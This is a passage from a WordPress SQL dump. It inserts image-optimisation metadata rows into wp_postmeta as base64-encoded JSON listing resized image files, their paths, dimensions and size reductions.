ODQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0xNjAweDEwNjAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMTYwMHgxMDYwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0xNjAweDEwNjAuanBnIiwicmVkdWN0aW9uIjozODU4LCJ0aW1lIjoxNDgzNTgwOTA2LCJpZCI6ODQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6Njc1LCJ0aW1lIjoxNDgzNTgwOTA5LCJpZCI6ODQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTE5LCJ0aW1lIjoxNDgzNTgwOTEzLCJpZCI6ODQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTY5LCJ0aW1lIjoxNDgzNTgwOTE2LCJpZCI6ODQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTI4MCwidGltZSI6MTQ4MzU4MDkyMCwiaWQiOjg0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDU0LCJ0aW1lIjoxNDgzNTgwOTIzLCJpZCI6ODQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo1NTQsInRpbWUiOjE0ODM1ODA5MjcsImlkIjo4NDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElSRVotMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElSRVotMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjc4MSwidGltZSI6MTQ4MzU4MDkzMCwiaWQiOjg0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSVJFWi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSVJFWi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODM5LCJ0aW1lIjoxNDgzNTgwOTM0LCJpZCI6ODQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJUkVaLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJUkVaLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMTE5LCJ0aW1lIjoxNDgzNTgwOTM4LCJpZCI6ODQwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29940, 839, 'wpfc_optimisation_reduction', '2064090'); 
INSERT INTO `wp_postmeta` VALUES (29941, 839, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUuanBnIiwid2lkdGgiOjM1MDQsImhlaWdodCI6MjMzNiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUuanBnIiwicmVkdWN0aW9uIjoyMDY0MDc3LCJ0aW1lIjoxNDgzNTgwOTUwLCJpZCI6IjgzOSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwOTUyLCJpZCI6ODM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MDk1NiwiaWQiOjgzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODA5NTksImlkIjo4Mzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODA5NjQsImlkIjo4Mzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwOTY2LCJpZCI6ODM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MDk3MCwiaWQiOjgzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODA5NzIsImlkIjo4Mzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwOTc1LCJpZCI6ODM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwOTc4LCJpZCI6ODM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwOTgwLCJpZCI6ODM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwOTgzLCJpZCI6ODM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwOTg2LCJpZCI6ODM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgwOTg4LCJpZCI6ODM5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29942, 838, 'wpfc_optimisation_reduction', '2942698'); 
INSERT INTO `wp_postmeta` VALUES (29943, 838, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LmpwZyIsIndpZHRoIjozNDU2LCJoZWlnaHQiOjIzMDQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjA4NDg2NjguanBnIiwicmVkdWN0aW9uIjoyOTQyNjg1LCJ0aW1lIjoxNDgzNTgxMDAxLCJpZCI6IjgzOCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwODQ4NjY4LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgxMDAzLCJpZCI6ODM4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDg0ODY2OC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDg0ODY2OC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDg0ODY2OC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MTAwNiwiaWQiOjgzOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjA4NDg2NjgtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjA4NDg2NjgtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjA4NDg2NjgtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODEwMDksImlkIjo4Mzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0